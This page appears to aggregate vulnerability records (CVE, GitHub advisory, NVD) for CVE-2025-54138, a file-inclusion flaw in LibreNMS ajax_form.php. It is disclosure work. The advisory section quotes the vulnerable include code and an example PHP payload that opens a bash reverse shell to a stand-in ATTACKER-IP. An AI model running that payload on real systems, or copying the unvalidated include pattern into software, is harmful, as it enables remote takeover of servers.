CVE-2025-54138 (GCVE-0-2025-54138)

Vulnerability from cvelistv5 – Published: 2025-07-22 21:33 – Updated: 2025-07-23 18:26

Title

LibreNMS has Authenticated Local File Inclusion in ajax_form.php that Allows RCE

Summary

LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring which includes support for a wide range of network hardware and operating systems. LibreNMS versions 25.6.0 and below contain an architectural vulnerability in the ajax_form.php endpoint that permits Remote File Inclusion based on user-controlled POST input. The application directly uses the type parameter to dynamically include .inc.php files from the trusted path includes/html/forms/, without validation or allowlisting. This pattern introduces a latent Remote Code Execution (RCE) vector if an attacker can stage a file in this include path — for example, via symlink, development misconfiguration, or chained vulnerabilities. This is fixed in version 25.7.0.

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-98 - Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/librenms/librenms/security/adv…	x_refsource_CONFIRM
	https://github.com/librenms/librenms/pull/17990	x_refsource_MISC
	https://github.com/librenms/librenms/commit/ec897…	x_refsource_MISC
	https://github.com/librenms/librenms/releases/tag…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	librenms	librenms	Affected: < 25.7.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-54138",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-07-23T18:26:36.521542Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-07-23T18:26:50.196Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "librenms",
          "vendor": "librenms",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 25.7.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring which includes support for a wide range of network hardware and operating systems. LibreNMS versions 25.6.0 and below contain an architectural vulnerability in the ajax_form.php endpoint that permits Remote File Inclusion based on user-controlled POST input. The application directly uses the type parameter to dynamically include .inc.php files from the trusted path includes/html/forms/, without validation or allowlisting. This pattern introduces a latent Remote Code Execution (RCE) vector if an attacker can stage a file in this include path \u2014 for example, via symlink, development misconfiguration, or chained vulnerabilities. This is fixed in version 25.7.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-98",
              "description": "CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program (\u0027PHP Remote File Inclusion\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-07-22T21:33:59.149Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/librenms/librenms/security/advisories/GHSA-gq96-8w38-hhj2",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/librenms/librenms/security/advisories/GHSA-gq96-8w38-hhj2"
        },
        {
          "name": "https://github.com/librenms/librenms/pull/17990",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/librenms/librenms/pull/17990"
        },
        {
          "name": "https://github.com/librenms/librenms/commit/ec89714d929ef0cf2321957ed9198b0f18396c81",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/librenms/librenms/commit/ec89714d929ef0cf2321957ed9198b0f18396c81"
        },
        {
          "name": "https://github.com/librenms/librenms/releases/tag/25.7.0",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/librenms/librenms/releases/tag/25.7.0"
        }
      ],
      "source": {
        "advisory": "GHSA-gq96-8w38-hhj2",
        "discovery": "UNKNOWN"
      },
      "title": "LibreNMS has Authenticated Local File Inclusion in ajax_form.php that Allows RCE"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-54138",
    "datePublished": "2025-07-22T21:33:59.149Z",
    "dateReserved": "2025-07-16T23:53:40.510Z",
    "dateUpdated": "2025-07-23T18:26:50.196Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-54138\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-07-23T18:26:36.521542Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-07-23T18:26:42.704Z\"}}], \"cna\": {\"title\": \"LibreNMS has Authenticated Local File Inclusion in ajax_form.php that Allows RCE\", \"source\": {\"advisory\": \"GHSA-gq96-8w38-hhj2\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"librenms\", \"product\": \"librenms\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 25.7.0\"}]}], \"references\": [{\"url\": \"https://github.com/librenms/librenms/security/advisories/GHSA-gq96-8w38-hhj2\", \"name\": \"https://github.com/librenms/librenms/security/advisories/GHSA-gq96-8w38-hhj2\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/librenms/librenms/pull/17990\", \"name\": \"https://github.com/librenms/librenms/pull/17990\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/librenms/librenms/commit/ec89714d929ef0cf2321957ed9198b0f18396c81\", \"name\": \"https://github.com/librenms/librenms/commit/ec89714d929ef0cf2321957ed9198b0f18396c81\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/librenms/librenms/releases/tag/25.7.0\", \"name\": \"https://github.com/librenms/librenms/releases/tag/25.7.0\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring which includes support for a wide range of network hardware and operating systems. LibreNMS versions 25.6.0 and below contain an architectural vulnerability in the ajax_form.php endpoint that permits Remote File Inclusion based on user-controlled POST input. The application directly uses the type parameter to dynamically include .inc.php files from the trusted path includes/html/forms/, without validation or allowlisting. This pattern introduces a latent Remote Code Execution (RCE) vector if an attacker can stage a file in this include path \\u2014 for example, via symlink, development misconfiguration, or chained vulnerabilities. This is fixed in version 25.7.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-98\", \"description\": \"CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program (\u0027PHP Remote File Inclusion\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-07-22T21:33:59.149Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-54138\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-07-23T18:26:50.196Z\", \"dateReserved\": \"2025-07-16T23:53:40.510Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-07-22T21:33:59.149Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

GHSA-GQ96-8W38-HHJ2

Vulnerability from github – Published: 2025-07-21 21:10 – Updated: 2025-07-23 13:37

Summary

LibreNMS has Authenticated Remote File Inclusion in ajax_form.php that Allows RCE

Details

LibreNMS 25.6.0 contains an architectural vulnerability in the ajax_form.php endpoint that permits Remote File Inclusion based on user-controlled POST input.

The application directly uses the type parameter to dynamically include .inc.php files from the trusted path includes/html/forms/, without validation or allowlisting:

if (file_exists('includes/html/forms/' . $_POST['type'] . '.inc.php')) {
    include_once 'includes/html/forms/' . $_POST['type'] . '.inc.php';
}

This pattern introduces a latent Remote Code Execution (RCE) vector if an attacker can stage a file in this include path — for example, via symlink, development misconfiguration, or chained vulnerabilities.

This is not an arbitrary file upload bug. But it does provide a powerful execution sink for attackers with write access (direct or indirect) to the include directory.

Conditions for Exploitation

Attacker must be authenticated
Attacker must control a file at includes/html/forms/{type}.inc.php (or symlink)

Example Impact (RCE)

If a PHP file or symlinked shell is staged in the include path, an attacker can achieve full remote code execution under the librenms user context:

<?php system('/bin/bash -c "bash -i >& /dev/tcp/ATTACKER-IP/4444 0>&1"'); ?>

https://github.com/user-attachments/assets/deb9ccd2-101c-4172-89b1-b840b7ed3812

Recommended Fix

Implement strict allow listing or hardcoded routing instead of dynamically including user-supplied filenames.
Avoid passing raw POST input into include_once.
Ensure the inclusion path is immutable and outside attacker control (e.g., avoid variable expansion into trusted paths).

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "librenms/librenms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "25.7.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-54138"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-98"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-07-21T21:10:51Z",
    "nvd_published_at": "2025-07-22T22:15:38Z",
    "severity": "HIGH"
  },
  "details": "LibreNMS 25.6.0 contains an architectural vulnerability in the `ajax_form.php` endpoint that permits Remote File Inclusion based on user-controlled POST input. \n\nThe application directly uses the `type` parameter to dynamically include `.inc.php` files from the trusted path `includes/html/forms/`, without validation or allowlisting:\n\n```php\nif (file_exists(\u0027includes/html/forms/\u0027 . $_POST[\u0027type\u0027] . \u0027.inc.php\u0027)) {\n    include_once \u0027includes/html/forms/\u0027 . $_POST[\u0027type\u0027] . \u0027.inc.php\u0027;\n}\n```\nThis pattern introduces a latent Remote Code Execution (RCE) vector if an attacker can stage a file in this include path \u2014 for example, via symlink, development misconfiguration, or chained vulnerabilities.\n\n\u003e  This is not an arbitrary file upload bug. But it does provide a powerful execution sink for attackers with write access (direct or indirect) to the include directory.\n\n# Conditions for Exploitation\n\n- Attacker must be authenticated    \n- Attacker must control a file at `includes/html/forms/{type}.inc.php` (or symlink)        \n\n# Example Impact (RCE)\n\nIf a PHP file or symlinked shell is staged in the include path, an attacker can achieve full remote code execution under the `librenms` user context:\n\n```php\n\u003c?php system(\u0027/bin/bash -c \"bash -i \u003e\u0026 /dev/tcp/ATTACKER-IP/4444 0\u003e\u00261\"\u0027); ?\u003e\n```\nhttps://github.com/user-attachments/assets/deb9ccd2-101c-4172-89b1-b840b7ed3812\n\n\n---\n\n# Recommended Fix\n\n- Implement strict allow listing or hardcoded routing instead of dynamically including user-supplied filenames. \n- Avoid passing raw POST input into `include_once`.\n- Ensure the inclusion path is immutable and outside attacker control (e.g., avoid variable expansion into trusted paths).",
  "id": "GHSA-gq96-8w38-hhj2",
  "modified": "2025-07-23T13:37:00Z",
  "published": "2025-07-21T21:10:51Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/security/advisories/GHSA-gq96-8w38-hhj2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54138"
    },
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/pull/17990"
    },
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/commit/ec89714d929ef0cf2321957ed9198b0f18396c81"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/librenms/librenms"
    },
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/releases/tag/25.7.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "LibreNMS has Authenticated Remote File Inclusion in ajax_form.php that Allows RCE"
}

FKIE_CVE-2025-54138

Vulnerability from fkie_nvd - Published: 2025-07-22 22:15 - Updated: 2025-08-05 17:52

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/librenms/librenms/commit/ec89714d929ef0cf2321957ed9198b0f18396c81	Patch
security-advisories@github.com	https://github.com/librenms/librenms/pull/17990	Issue Tracking
security-advisories@github.com	https://github.com/librenms/librenms/releases/tag/25.7.0	Release Notes
security-advisories@github.com	https://github.com/librenms/librenms/security/advisories/GHSA-gq96-8w38-hhj2	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	librenms	librenms	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "3DB657BC-9094-444A-A49C-AE6D527F3F51",
              "versionEndExcluding": "25.7.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring which includes support for a wide range of network hardware and operating systems. LibreNMS versions 25.6.0 and below contain an architectural vulnerability in the ajax_form.php endpoint that permits Remote File Inclusion based on user-controlled POST input. The application directly uses the type parameter to dynamically include .inc.php files from the trusted path includes/html/forms/, without validation or allowlisting. This pattern introduces a latent Remote Code Execution (RCE) vector if an attacker can stage a file in this include path \u2014 for example, via symlink, development misconfiguration, or chained vulnerabilities. This is fixed in version 25.7.0."
    },
    {
      "lang": "es",
      "value": "LibreNMS es un sistema de monitorizaci\u00f3n de red con autodescubrimiento basado en PHP/MySQL/SNMP, compatible con una amplia gama de hardware de red y sistemas operativos. Las versiones 25.6.0 y anteriores de LibreNMS contienen una vulnerabilidad arquitect\u00f3nica en el endpoint ajax_form.php que permite la inclusi\u00f3n remota de archivos (.inc.php) mediante la entrada POST controlada por el usuario. La aplicaci\u00f3n utiliza directamente el par\u00e1metro type para incluir din\u00e1micamente archivos .inc.php desde la ruta de confianza `includes/html/forms/`, sin validaci\u00f3n ni inclusi\u00f3n en la lista de permitidos. Este patr\u00f3n introduce un vector latente de ejecuci\u00f3n remota de c\u00f3digo (RCE) si un atacante puede preparar un archivo en esta ruta de inclusi\u00f3n, por ejemplo, mediante un enlace simb\u00f3lico, una configuraci\u00f3n incorrecta en el desarrollo o vulnerabilidades encadenadas. Esto se ha corregido en la versi\u00f3n 25.7.0."
    }
  ],
  "id": "CVE-2025-54138",
  "lastModified": "2025-08-05T17:52:39.603",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.6,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-07-22T22:15:38.240",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/librenms/librenms/commit/ec89714d929ef0cf2321957ed9198b0f18396c81"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Issue Tracking"
      ],
      "url": "https://github.com/librenms/librenms/pull/17990"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/librenms/librenms/releases/tag/25.7.0"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/librenms/librenms/security/advisories/GHSA-gq96-8w38-hhj2"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-98"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-54138 (GCVE-0-2025-54138)

GHSA-GQ96-8W38-HHJ2

Conditions for Exploitation

Example Impact (RCE)

Recommended Fix

FKIE_CVE-2025-54138

Tags

Sightings

Nomenclature